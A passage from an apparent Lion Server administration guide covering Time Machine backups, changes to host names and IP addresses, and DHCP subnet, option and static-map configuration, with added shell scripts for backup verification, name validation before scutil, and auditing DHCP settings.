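    ( cd "$1" && find . -type f -print | sort | while IFS= read -r f; do cksum "$f"; done )
}

# Full file-level copy: archive everything and keep the manifest that later
# incremental runs are compared against.
full_backup() {   # full_backup <source-dir> <backup-dir>
    ( cd "$1" && tar -cf "$2/full.tar" . )
    manifest "$1" > "$2/manifest.full"
}

# Incremental backup: archive only files whose manifest line is new or changed
# since the full backup. Prints the number of files archived. File names are
# assumed to contain no whitespace.
incremental_backup() {   # incremental_backup <source-dir> <backup-dir>
    manifest "$1" > "$2/manifest.now"
    grep -vxF -f "$2/manifest.full" "$2/manifest.now" \
        | sed 's/^[0-9][0-9]* [0-9][0-9]* //' > "$2/incr.list" || true
    if [ -s "$2/incr.list" ]; then
        ( cd "$1" && tar -cf "$2/incr.tar" $(cat "$2/incr.list") )
    fi
    wc -l < "$2/incr.list" | tr -d ' '
}

# Restore: extract the full archive, then layer the incremental on top.
# Deletions are not recorded, so a file removed after the full backup
# reappears on restore; verify_restore would report that as a mismatch.
restore() {   # restore <backup-dir> <target-dir>
    mkdir -p "$2"
    ( cd "$2" && tar -xf "$1/full.tar" )
    if [ -f "$1/incr.tar" ]; then ( cd "$2" && tar -xf "$1/incr.tar" ); fi
}

# Test restoration: the restored tree must produce the same manifest as the
# live tree. Prints "ok" or "MISMATCH".
verify_restore() {   # verify_restore <source-dir> <restored-dir>
    live=$(mktemp); back=$(mktemp)
    manifest "$1" > "$live"
    manifest "$2" > "$back"
    if cmp -s "$live" "$back"; then verdict=ok; else verdict=MISMATCH; fi
    rm -f "$live" "$back"
    echo "$verdict"
}

# End-to-end walk-through on constructed data; prints "<files in incremental> <verdict>".
run_demo() {
    work=$(mktemp -d)
    src=$work/src; bak=$work/bak; out=$work/restored
    mkdir -p "$src/etc" "$bak"
    printf 'ServerName www.example.test\n' > "$src/etc/httpd.conf"
    printf 'alice:501\n' > "$src/etc/users"
    full_backup "$src" "$bak"
    # Day two: one file changes and one is added; only those two go into the incremental.
    printf 'ServerName mail.example.test\n' > "$src/etc/httpd.conf"
    printf 'staff:20\n' > "$src/etc/groups"
    count=$(incremental_backup "$src" "$bak")
    restore "$bak" "$out"
    verdict=$(verify_restore "$src" "$out")
    rm -rf "$work"
    echo "$count $verdict"
}

run_demo
```

The verification step is where this scheme earns its keep: if a file had been deleted from the source after the full backup, the restore would bring it back, the two manifests would differ, and verify_restore would print MISMATCH. That is precisely the kind of defect that regular test restorations are meant to surface before a real recovery depends on the backup.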

Server backup and restore


You can back up server files automatically using Time Machine, a comprehensive backup solution. Time Machine automatically makes a complete backup of all files on the computer to a locally attached external hard drive, an available internal hard disk, or a remote network file system. It also keeps track as files are created, updated, or deleted over time. Time Machine backs up the changes and creates a history of the file system that you can navigate by date. You can use its intuitive time-based visual browser to search back through time to find and restore any files that were backed up.

You set backup options in the Time Machine pane of System Preferences on the server. You can set up a list of folders and disks that you want to exclude from backup. Time Machine automatically excludes temporary files and cache files located in /tmp/, /Library/Logs/, /Library/Caches/, and /Users/username/Library/Caches/.

Note: If the server is a portable computer, you may improve its performance by turning off Time Machine local snapshots. For instructions, see Turn off Time Machine local snapshots.

Time Machine automatically backs up data and settings for these services: Address Book, File Sharing, iCal, iChat, Mail, Podcast, Profile Manager, Time Machine, VPN, Web, and Wiki. Time Machine also automatically backs up some settings for other services, but you may not be able to completely restore settings changed with Server Admin or with command-line tools.

After using Time Machine to back up your server, you can restore your server to a previous state. For information about backing up and restoring with Time Machine, search Mac Help for Back up your Mac.

Turn off Time Machine local snapshots

You may improve performance of a portable computer by turning off Time Machine local snapshots. If your server is a portable computer, Time Machine may use the internal disk to store local snapshots of files that have changed. Storing these local snapshots may degrade server performance. You can turn off saving of local snapshots by using the tmutil command-line tool.

Open Terminal (located in Launchpad's Utilities folder), and enter:

$ sudo tmutil disablelocal

Network identity

Understanding changes to the server IP address or network identity


When you change a server's IP address, host name, local hostname, or computer name, additional configuration steps might be needed for each service provided. Each service relies on IP addresses or names differently; therefore, the combination of steps depends on your individual setup. Learn more about how network identity changes affect:
- Infrastructure services
- Collaboration services
- File services
- Mail services
- Podcast services
- Web and wiki services
- Other services

Understanding Lion Server names


Three names are used by Lion Server: computer name, local hostname, and host name. They are used by different parts of the system for different reasons, and are not linked. Changing the computer name and the local hostname is not the same thing as changing the host name. The computer name is a user-friendly name for the system and is shown in the Finder and tools like Apple Remote Desktop. The local hostname is a domain name, usable only on the local network, and is published to other services that are Bonjour-aware. The host name is the Internet host name, which is a fully qualified domain name. Only the host name is the Internet-routable name that services use for network identity.

Change the server's host name after setup


You can change the host name of a server after setup, but it is not recommended. You can use the scutil command-line tool to set the host name. The host name is the Internet host name, which is a fully qualified domain name. Only the host name is the Internet-routable name that services use for network identity.

The Server app includes an assistant for changing the server's host name. The assistant can also be used to change the server's network address. The assistant reconfigures services to use the new host name and any other changes to the network configuration. For information, see Find or change your server's host name.

If you change a server's host name after setup, the name must be changed with your DNS service provider. Until the server's host name matches the name with the DNS service provider, several services will not function. Changing your host name can have significant unintended consequences, depending on the services your server provides. For information on the effects of changing the host name, see Understanding IP address or network identity changes on infrastructure services.

Note: If you choose not to use Server App to change the host name, the changeip command-line tool is still available, but not recommended.

Use Server App to change the server's host name. See Find or change your server's host name. If you choose not to use Server App, use scutil to change the host name:

sudo scutil --set (ComputerName|LocalHostName|HostName) <NewName.domain.tld>

Command example:

sudo scutil --set HostName newhost.example.com

Change the servers computer name and the local hostname


You can use the scutil command-line tool to set the computer name and local hostname. The computer name is a user-friendly name for the system and is shown in the Finder and tools like Apple Remote Desktop. The local hostname is a domain name, usable only on the local network, and is published to other services that are Bonjour-aware.

Use scutil to change the computer name and local hostname:

sudo scutil --set ComputerName <newComputertitle>
sudo scutil --set LocalHostName <newLocalHosttitle>
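Both the host name change in the previous topic and the computer name and local hostname change above are applied with scutil --set, and the text stresses that the three names are not linked and that a host name which does not match DNS leaves several services non-functional. The script below is an added example written for this page, not from the Lion Server manual or Apple's tools: it checks that a proposed HostName is a fully qualified domain name and that a LocalHostName is a single DNS label before printing (or, with DRY_RUN=0 on a real server, running) the corresponding scutil commands. The function and variable names and the sample names are assumptions made for this example.

```sh
#!/bin/sh
# Added example, not from the Lion Server manual: validate the names before
# handing them to scutil --set. HostName must be a fully qualified domain name;
# LocalHostName must be a single DNS label. DRY_RUN defaults to 1 so the
# script only prints the commands it would run; set DRY_RUN=0 on a real
# server to apply them. The sample names below are constructed.
set -eu
DRY_RUN=${DRY_RUN:-1}

# One DNS label: 1 to 63 characters, letters, digits and hyphens only,
# and no leading or trailing hyphen.
is_label() {
    [ ${#1} -ge 1 ] && [ ${#1} -le 63 ] || return 1
    case $1 in -*|*-|*[!A-Za-z0-9-]*) return 1 ;; esac
}

# Fully qualified domain name: two or more valid labels, at most 253
# characters, no leading or trailing dot. A single label is a local hostname,
# not the Internet host name the text describes.
is_fqdn() {
    [ ${#1} -le 253 ] || return 1
    case $1 in *.*) ;; *) return 1 ;; esac
    case $1 in .*|*.) return 1 ;; esac
    (
        IFS=.
        for label in $1; do
            is_label "$label" || exit 1
        done
    )
}

# Run (or in dry-run mode print) one scutil --set command.
run_scutil() {   # run_scutil <ComputerName|LocalHostName|HostName> <value>
    if [ "$DRY_RUN" = 1 ]; then
        printf 'sudo scutil --set %s "%s"\n' "$1" "$2"
    else
        sudo scutil --set "$1" "$2"
    fi
}

set_host_name() {
    is_fqdn "$1" || { echo "refused HostName '$1': not a fully qualified domain name" >&2; return 1; }
    run_scutil HostName "$1"
}

set_local_host_name() {
    is_label "$1" || { echo "refused LocalHostName '$1': must be a single DNS label" >&2; return 1; }
    run_scutil LocalHostName "$1"
}

set_computer_name() {
    [ -n "$1" ] || { echo "refused ComputerName: empty" >&2; return 1; }
    run_scutil ComputerName "$1"
}

# Dry-run walk-through with constructed names; nothing changes unless DRY_RUN=0.
set_computer_name "Mail Server"
set_local_host_name mailserver
set_host_name mail.example.com
```

A syntax check cannot tell you whether the name is registered with your DNS provider. Before applying the change, confirm that the forward and reverse records for the new name resolve to this server, and plan for the per-service follow-up described under network identity changes.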

Changing the IP address of a server


You can change the IP address of a server using the Network pane of System Preferences or the networksetup tool. Do not turn off the primary network interface and then turn it back on with a different address. Several services will not get the needed notification to update their configuration.

Changing your IP address can have significant unintended consequences, depending on the services your server provides. For information on the effects of changing the IP addresses, see Understanding IP address or network identity changes on infrastructure services. The changeip command-line tool can accomplish manually what is done automatically, and it is still available.

IP address changes and Server App

The Server app detects and posts an alert about network configuration changes, including host name change and network address change. The alert contains a button that reconfigures services to use the new network configuration. It does this by running the changeip command-line tool. The automated resolution takes care of services managed by the Server app. For information, see Find or change your server's IP address.

Network infrastructure services

DHCP

About DHCP service

If your organization has more clients than IP addresses, you can benefit from using Dynamic Host Configuration Protocol (DHCP) service. IP addres ses are as signed as needed, and when theyre not needed, they can be used by other clients. You can use a combination of static and dynamic IP addresses for your network. DHCP service lets you administer and distribute IP address es to computers from your server. When you configure the DHCP server, you assign a block of IP address es that can be made available to clients. Each time a computer configured to use DHCP s tarts up, it looks for a DHCP server on your network. If it finds a DHCP server, the client computer then requests an IP addres s. The DHCP server checks for an available IP addres s and s ends it to the computer with a lease period (the length of time the client computer can use the address) and configuration information. Organizations can benefit from the features of DHCP service, such as the ability to set Domain Name System (DNS) and Lightweight Directory Access Protocol (LDAP) options for computers without needing to configure each client. You can us e the DHCP module in Server Admin to: Configure and administer DHCP s ervice Create and adminis ter subnets Configure DNS, LDAP, and Windows Internet Naming Service (WINS) options for client computers View DHCP address leases Creating subnets Subnets are groupings of computers on a network that simplify administration. You can organize subnets any way that is useful to you. For example, you can create s ubnets for groups in your organization or for floors of a building. After you group computers into subnets, you can configure options for all computers on a s ubnet at one time ins tead of setting options for individual computers. Each subnet needs a way to connect to other subnets. A hardware device called a router typically connects subnets. 
Assigning IP addresses dynamically With dynamic address allocation, an IP address is assigned for a limited period of time (the lease time) or until the computer doesnt need the IP addres s, whichever comes first. By us ing short leases , DHCP can reass ign IP addresses on networks that have more computers than IP address es. Leases are renewed if the addres s is nt needed by another computer. Addresses allocated to VPN clients are distributed much like DHCP addresses , but they dont come out of the same range of addresses as DHCP. If you plan on using VPN, leave some address es unallocated by DHCP for us e by VPN. Using static IP addresses Static IP addresses are assigned to a computer or device once and then dont change. You can assign s tatic IP addres ses to computers that mus t have a continuous Internet presence, such as web servers. Other devices that must be continuously available to network users, such as printers , can also benefit from static IP address es. Static IP addresses can be s et up manually by entering the IP address on the computer (or other device) that is as signed the address, or by configuring DHCP to provide the s ame addres s to a s pecific computer or device on each request. Manually configured s tatic IP addres ses avoid potential issues that s ome services can have with DHCP-ass igned addresses, and they dont suffer from the delay that DHCP requires to as sign an address. DHCP-ass igned addresses permit address configuration changes at the DHCP server rather than at each client. Dont include manually ass igned static IP address ranges in the range distributed by DHCP. You can set up DHCP to always serve the s ame address to the s ame computer. For more information, see Use DHCP to assign static IP addresses. Locating the DHCP server When a computer looks for a DHCP server, it broadcasts a mess age. 
If your DHCP server is on a different subnet from the computer, make sure the routers that connect your subnets can forward client broadcasts and DHCP server responses. A relay agent or router on your network that can relay BootP communications works for DHCP. If you don't have a means to relay BootP communications, place the DHCP server on the same subnet as your client.

Interacting with other DHCP servers
You might already have DHCP servers on your network, such as AirPort Base Stations. Lion Server can coexist with other DHCP servers as long as each DHCP server uses a unique pool of IP addresses. If AirPort Base Stations are on separate subnets, configure your routers to forward client broadcasts and DHCP server responses as described in Locating the DHCP server.

Using multiple DHCP servers on a network
You can have multiple DHCP servers on the same network. However, they must be configured properly to prevent interference with each other. Each server needs a unique pool of IP addresses to distribute.

Assigning reserved IP addresses
Some IP addresses can't be assigned, including addresses reserved for loopback and broadcasting. Your ISP won't assign these addresses to you. If you try to configure DHCP to use these addresses, you're warned that the addresses are invalid and you must enter valid addresses.

Network infrastructure services
DHCP
Set up DHCP

DHCP setup overview


Here is an overview of the basic steps for setting up DHCP service.

Note: If you used Gateway Setup Assistant to configure ports on your server when you installed Lion Server, some DHCP information is configured. Follow the steps in this section to finish configuring DHCP service.

Before you begin
For issues to keep in mind when you set up DHCP service, read About DHCP service.

Enable DHCP service
Before configuring DHCP service, enable DHCP. See Enable DHCP service.

Create subnets
Use Server Admin to create a pool of IP addresses that are shared by the client computers on your network. You create one range of shared addresses per subnet. These addresses are assigned by the DHCP server when a client issues a request. See Create DHCP subnets.

Configure DHCP log settings
You can log the activity and errors in DHCP service to help you identify use patterns and problems with your server. DHCP service records diagnostic messages in the system log file. To keep this file from growing too large, you can suppress most messages by changing log settings in the Logging pane of DHCP service settings. See Configure log settings for DHCP service.

Start DHCP service
After you configure DHCP, start the service to make it available. See Start DHCP service.


Enable DHCP service


Before you can configure DHCP settings, you must enable DHCP service in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Services.
4. Select the DHCP checkbox.
5. Click Save.


Create DHCP subnets


Subnets are groupings of computers on the same network that can be organized by location (for example, floors of a building) or by usage (for example, eighth-grade students). Each subnet has at least one range of IP addresses assigned to it.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Click the Add button (+).
6. Enter a descriptive name for the new subnet.
7. Enter a starting and ending IP address for this subnet range. Addresses must be contiguous and they can't overlap other subnet ranges.
8. Enter the subnet mask for the network address range.
9. From the pop-up menu, choose the network interface to host DHCP service.
10. Enter the IP address of the router for this subnet. If the server you're configuring is the router for the subnet, enter this server's internal LAN IP address as the router's address.
11. Define a lease time in hours, days, weeks, or months.
12. If you want to set DNS, LDAP, or WINS information for this subnet, enter these now. For more information, see Set the DNS server for a DHCP subnet, Set LDAP options for a subnet, and Set WINS options for a subnet.
13. Click Save.
14. To enable the subnet, select the Enable checkbox.
15. Click Save.


Use serveradmin to create DHCP subnets


You can create a DHCP subnet using serveradmin. The subnetID parameter is a unique number that identifies the subnet. It can be any number not assigned to another subnet on the server. Also, it can include embedded hyphens (-).

Parameter         Description
subnetID          A unique number that identifies the subnet. Can be any number not assigned to another subnet on the server. Can include embedded hyphens (-).
Other parameters  The standard subnet settings described in the serveradmin man pages.

For information about setting DHCP subnet parameters, see the serveradmin man pages. For information about serveradmin, see its man page.

To create a DHCP subnet:
Note: Include the special first setting (ending with = create). This is how you tell serveradmin to create the settings array with the specified subnet ID.
$ sudo serveradmin settings
dhcp:subnets:_array_id:subnetID = create
dhcp:subnets:_array_id:subnetID:descriptive_name = description
dhcp:subnets:_array_id:subnetID:net_range_start = start-address
dhcp:subnets:_array_id:subnetID:net_range_end = end-address
dhcp:subnets:_array_id:subnetID:net_mask = mask
dhcp:subnets:_array_id:subnetID:selected_port_name = port
dhcp:subnets:_array_id:subnetID:dhcp_router = router
dhcp:subnets:_array_id:subnetID:lease_time_secs = lease-time
dhcp:subnets:_array_id:subnetID:dhcp_enabled = (yes|no)
Control-D

To view DHCP configuration settings:
$ sudo serveradmin settings dhcp


Configure log settings for DHCP service


You can choose the level of detail for DHCP service logs:
Low (errors only): Indicates conditions where you must take immediate action (for example, if the DHCP server can't start up). This level corresponds to bootpd reporting in quiet mode with the -q flag.
Medium (errors and warnings): Alerts you to conditions where data is inconsistent but the DHCP server can still operate. This level corresponds to default bootpd reporting.
High (all events): Records activity by DHCP service, including routine functions. This level corresponds to bootpd reporting in verbose mode with the -v flag.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Settings.
5. From the Log Level pop-up menu, choose the logging option you want.
6. Click Save.


Use serveradmin to configure log settings for DHCP service


The value can be LOW, MEDIUM, or HIGH.

To set the log detail level:
$ sudo serveradmin settings dhcp:logging_level = value

For information about serveradmin, see its man page.


Start DHCP service

You start DHCP service to provide IP addresses to users. You must have at least one subnet created and enabled.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click the Start DHCP button (below the Servers list). If the Firewall service is running, a warning appears asking you to verify that all ports used by DHCP are open (DHCP uses UDP ports 67 and 68). Click OK.
The service runs until you stop it. It restarts when your server is restarted.


Use serveradmin to start DHCP service


You start DHCP service to provide IP addresses to users. You must have at least one subnet created and enabled.

To start DHCP service:
$ sudo serveradmin start dhcp

For information about serveradmin, see its man page.

Network infrastructure services
DHCP
Manage DHCP

Stop DHCP service


When starting or stopping DHCP, you must have at least one subnet created and enabled.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Stop Now.


Use serveradmin to stop DHCP service


When stopping DHCP, you must have at least one subnet created and enabled.

To stop DHCP service:
$ sudo serveradmin stop dhcp

For information about serveradmin, see its man page.


Change DHCP subnet settings


Use Server Admin to change DHCP subnet settings. You can change the IP address range, subnet mask, network interface, router, or lease time.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Select a subnet.
6. Make your changes. Changes can include adding DNS, LDAP, or WINS information. You can also redefine address ranges or redirect the network interface that responds to DHCP requests.
7. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Use serveradmin to change DHCP subnet settings


To change a DHCP setting:
$ sudo serveradmin settings dhcp:setting = value

To change several DHCP settings:
$ sudo serveradmin settings
dhcp:setting = value
dhcp:setting = value
dhcp:setting = value
[...]
Control-D

To view all DHCP settings:
$ sudo serveradmin settings dhcp

Parameter  Description
setting    A DHCP service setting.
value      A relevant value for the setting.

For information about setting DHCP subnet parameters, see the serveradmin man pages. For information about serveradmin, see its man page.


Delete DHCP subnets


You can delete subnets and subnet IP address ranges so they are no longer distributed to computers.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Select a subnet.
6. Click the Delete button (–).
7. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Disable subnets temporarily


You can temporarily shut down a subnet without losing its settings. No IP addresses from the subnet's range are distributed on the selected interface to any computer until you reenable the subnet.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Deselect the Enable checkbox next to the subnet to disable.
6. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Change IP address lease times for a subnet


You can change how long IP addresses on a subnet are available to computers.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Select a subnet.
6. From the Lease Time pop-up menu, choose a time scale (hours, days, weeks, or months).
7. In the Lease Time field, enter a number.
8. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Set the DNS server for a DHCP subnet


You can determine the DNS servers and default domain name a subnet should use. DHCP service provides this information to computers in the subnet.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Select a subnet.
6. Click DNS.
7. Enter the primary and secondary name server IP addresses you want DHCP clients to use.
8. Enter the default domain of the subnet.
9. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Use serveradmin to set the DNS server for a DHCP subnet


Use the same subnetID used to create the subnet.

Parameter         Description
subnetID          A unique number that identifies the subnet. Can be any number not assigned to another subnet on the server. Can include embedded hyphens (-).
dns-server-n      The IP address of a DNS server. To specify additional DNS servers, add incrementing dhcp_domain_name_server settings, _array_index:n for each additional value.
Other parameters  The standard subnet settings described in the serveradmin man pages.

To set DNS options for a subnet:
$ sudo serveradmin settings
dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:0 = dns-server-1
dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:1 = dns-server-2
dhcp:subnets:_array_id:subnetID:dhcp_domain_name = domain
Control-D

For information about serveradmin, see its man page.


Set LDAP options for a subnet


You can use DHCP to provide your clients with LDAP server information, but Mac OS X v10.5 or later clients won't automatically bind to the LDAP server. The order in which the LDAP servers appear in the list determines their search order in the automatic Open Directory search policy.

If you are using this Mac server as an LDAP master, LDAP options are populated with the necessary configuration information. If your LDAP master server is another computer, you must know the domain name or IP address of the LDAP database to use, and you must know the LDAP search base.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Select a subnet.
6. Click LDAP.
7. Enter the domain name or IP address of the LDAP server for this subnet.
8. Enter the search base for LDAP searches.
9. If you're using a nonstandard port, enter the LDAP port number.
10. If necessary, select LDAP over SSL. Use this option to secure LDAP communication.
11. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Use serveradmin to set LDAP options for a subnet


Use the same subnetID you used to create the subnet.

Parameter         Description
subnetID          A unique number that identifies the subnet. Can be any number not assigned to another subnet on the server. Can include embedded hyphens (-).
Other parameters  The standard subnet settings described in the serveradmin man pages.

To set LDAP options for a subnet:
$ sudo serveradmin settings
dhcp:subnets:_array_id:subnetID:dhcp_ldap_url:_array_index:0 = ldap-server
Control-D

For information about serveradmin, see its man page.


Set WINS options for a subnet


You can give more information to computers running Windows on a subnet by adding Windows-specific settings to the DHCP-supplied network configuration data. These Windows-specific settings permit Windows clients to browse Network Neighborhood.

You must know the domain name or IP address of the Windows Internet Naming Service/NetBIOS Name Server (WINS/NBNS) primary and secondary servers (usually the IP address of the DHCP server), and the NetBIOS over TCP/IP (NBT) node type. The following are possible node types:
Hybrid (h-node): Checks the WINS server and then broadcasts.
Peer (p-node): Checks the WINS server for name resolution.
Broadcast (b-node): Broadcasts for name resolution (most commonly used).
Mixed (m-node): Broadcasts for name resolution and then checks the WINS server.

The NetBIOS Datagram Distribution (NBDD) server works with NBNS to route datagrams to computers on another subnet. The NetBIOS Scope ID isolates NetBIOS communication on a network. The NetBIOS Scope ID is appended to the NetBIOS name of the computer. Computers that have the same NetBIOS Scope ID can communicate. NBDD Server and the NetBIOS Scope ID are typically not used, but you might need them depending on your Windows clients' configuration and Windows network infrastructure.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets.
5. Select a subnet.
6. Click WINS.
7. Enter the domain name or IP address of the WINS/NBNS primary and secondary servers for this subnet.
8. Enter the domain name or IP address of the NBDD server for this subnet.
9. From the pop-up menu, choose the NBT node type.
10. Enter the NetBIOS Scope ID.
11. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Use serveradmin to set WINS options for a subnet


Use the same subnetID you used to create the subnet.

Parameter         Description
subnetID          A unique number that identifies the subnet. Can be any number not assigned to another subnet on the server. Can include embedded hyphens (-).
Other parameters  The standard subnet settings described in the serveradmin man pages.

To set WINS options for a subnet:
$ sudo serveradmin settings
dhcp:subnets:_array_id:subnetID:WINS_primary_server = wins-server-1
dhcp:subnets:_array_id:subnetID:WINS_secondary_server = wins-server-2
dhcp:subnets:_array_id:subnetID:WINS_NBDD_server = nbdd-server
dhcp:subnets:_array_id:subnetID:WINS_node_type = node-type
dhcp:subnets:_array_id:subnetID:WINS_scope_id = scope-ID
Control-D

For information about serveradmin, see its man page.


Use DHCP to assign static IP addresses


You can always assign the same address to specific computers. This helps simplify configuration when using DHCP and lets you have static servers or services. To keep the same IP address for a computer, you must know the computer's Ethernet address (also known as the MAC or hardware address). Each network interface has its own Ethernet address. If a computer is connected to a wired network and a wireless network, it uses a different Ethernet address for each network connection.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Static Maps.
5. Click Add Computer.
6. Enter the name of the computer.
7. In the Network Interfaces list, click the column to enter the following information:
MAC address of the computer that needs a static address
IP address to assign to the computer
8. If your computer has other network interfaces that require static IP addresses, click the Add button (+) and enter the IP address to assign for each interface.
9. Click OK.
10. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.


Use serveradmin to assign static IP addresses


Parameter   Description
mapID       A unique ID code for the map entry. The ID must be unique for each static map defined on the server.
ip_address  IP address of the host.
name        Host's DNS name.
en_address  Host's Ethernet address.

To assign a static map:
$ sudo serveradmin settings
dhcp:static_maps:_array_id:examplehost/mapID = create
dhcp:static_maps:_array_id:examplehost/mapID:ip_address = "1.2.3.4"
dhcp:static_maps:_array_id:examplehost/mapID:name = "examplehost"
dhcp:static_maps:_array_id:examplehost/mapID:en_address = "00:30:a1:a2:a1:23"
Control-D

For information about static map IDs, see the serveradmin man pages. For information about serveradmin, see its man page.
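Because sudo serveradmin settings dhcp prints every subnet and static map as flat key = value lines (see Use serveradmin to change DHCP subnet settings), the dump can be audited for the conditions this page warns about: a range that overlaps another subnet's range (the same condition that breaks coexisting DHCP servers), and static maps that reuse a hardware address or an IP address, or carry a malformed one. The script below is an added example, not code from the guide or from Lion Server. Its sample dump is constructed from the key names shown on this page; on a real server you would run sudo serveradmin settings dhcp | audit_dhcp_settings instead of the sample function.

```shell
#!/bin/sh
# Added example (not from the Lion Server guide): audit a "serveradmin settings
# dhcp" dump for overlapping subnet ranges, reused static-map identities, and
# malformed MAC addresses. Key names are the ones shown on this page; the
# sample dump below is constructed.

# Reads the dump on stdin, prints one finding per line, exits 1 if any.
audit_dhcp_settings() {
    awk '
    function ip2int(ip,    o) {
        split(ip, o, ".")
        return ((o[1] * 256 + o[2]) * 256 + o[3]) * 256 + o[4]
    }
    {
        # dhcp:<section>:_array_id:<id>:<key> = <value>
        split($0, f, ":")
        if (f[1] != "dhcp" || f[3] != "_array_id") next
        section = f[2]
        if (section != "subnets" && section != "static_maps") next
        rest = substr($0, length("dhcp:" section ":_array_id:") + 1)
        eq = index(rest, " = "); if (eq == 0) next
        path = substr(rest, 1, eq - 1); val = substr(rest, eq + 3)
        gsub(/"/, "", val)
        k = split(path, p, ":"); key = p[k]
        id = substr(path, 1, length(path) - length(key) - 1)
        if (section == "subnets") { subnet[id, key] = val; subnets[id] = 1 }
        else { smap[id, key] = val; smaps[id] = 1 }
    }
    END {
        findings = 0
        # Two ranges overlap when each starts no later than the other ends.
        for (a in subnets) for (b in subnets) if (a < b) {
            as = ip2int(subnet[a, "net_range_start"]); ae = ip2int(subnet[a, "net_range_end"])
            bs = ip2int(subnet[b, "net_range_start"]); be = ip2int(subnet[b, "net_range_end"])
            if (as <= be && bs <= ae) {
                printf "overlap: subnet %s and subnet %s share addresses\n", a, b; findings++
            }
        }
        hex = "[0-9a-f][0-9a-f]"
        macre = "^" hex ":" hex ":" hex ":" hex ":" hex ":" hex "$"
        for (id in smaps) {
            mac = tolower(smap[id, "en_address"]); ip = smap[id, "ip_address"]
            if (mac !~ macre) { printf "bad MAC: static map %s has en_address \"%s\"\n", id, smap[id, "en_address"]; findings++ }
            else if (mac in seen_mac) { printf "duplicate MAC: static maps %s and %s both use %s\n", seen_mac[mac], id, mac; findings++ }
            else seen_mac[mac] = id
            if (ip in seen_ip) { printf "duplicate IP: static maps %s and %s both use %s\n", seen_ip[ip], id, ip; findings++ }
            else seen_ip[ip] = id
        }
        exit (findings > 0)
    }'
}

# Constructed dump in the shape "sudo serveradmin settings dhcp" prints,
# reduced to the keys the audit needs.
sample_settings() {
    cat <<'EOF'
dhcp:subnets:_array_id:lan-1:descriptive_name = "Office LAN"
dhcp:subnets:_array_id:lan-1:net_range_start = "192.168.1.10"
dhcp:subnets:_array_id:lan-1:net_range_end = "192.168.1.200"
dhcp:subnets:_array_id:lan-2:descriptive_name = "Lab"
dhcp:subnets:_array_id:lan-2:net_range_start = "192.168.1.150"
dhcp:subnets:_array_id:lan-2:net_range_end = "192.168.1.250"
dhcp:subnets:_array_id:lan-3:descriptive_name = "Guest"
dhcp:subnets:_array_id:lan-3:net_range_start = "192.168.2.10"
dhcp:subnets:_array_id:lan-3:net_range_end = "192.168.2.200"
dhcp:static_maps:_array_id:printer/1:ip_address = "192.168.1.20"
dhcp:static_maps:_array_id:printer/1:en_address = "00:30:a1:a2:a1:23"
dhcp:static_maps:_array_id:nas/2:ip_address = "192.168.1.21"
dhcp:static_maps:_array_id:nas/2:en_address = "00:30:A1:A2:A1:23"
dhcp:static_maps:_array_id:camera/3:ip_address = "192.168.1.22"
dhcp:static_maps:_array_id:camera/3:en_address = "00-30-a1-a2-a1-99"
EOF
}

if sample_settings | audit_dhcp_settings; then
    echo "no findings"
else
    echo "review the findings above before starting DHCP"
fi
```

The MAC comparison is case-insensitive because bootpd matches hardware addresses, not the spelling an administrator typed, so two maps that differ only in case are the same identity; the sample catches exactly that, plus the hyphenated address that would never match a client and the Lab range that overlaps the Office range.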


Remove or change static address maps


You can change static mappings or remove them as needed.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Static Maps.
5. Select a mapping to Edit or Remove.
6. Click Edit or Remove. If you are editing the mapping, make the changes you want, then click OK.
7. Click Save.
If DHCP is running, you are prompted to restart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.

Network infrastructure services
DHCP
Monitor DHCP

Check DHCP service status


The status overview shows the following summary of DHCP service:
Whether the service is running
How many clients it has
When the service was started
How many IP addresses are statically assigned from your subnets
The last time the client database was updated

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
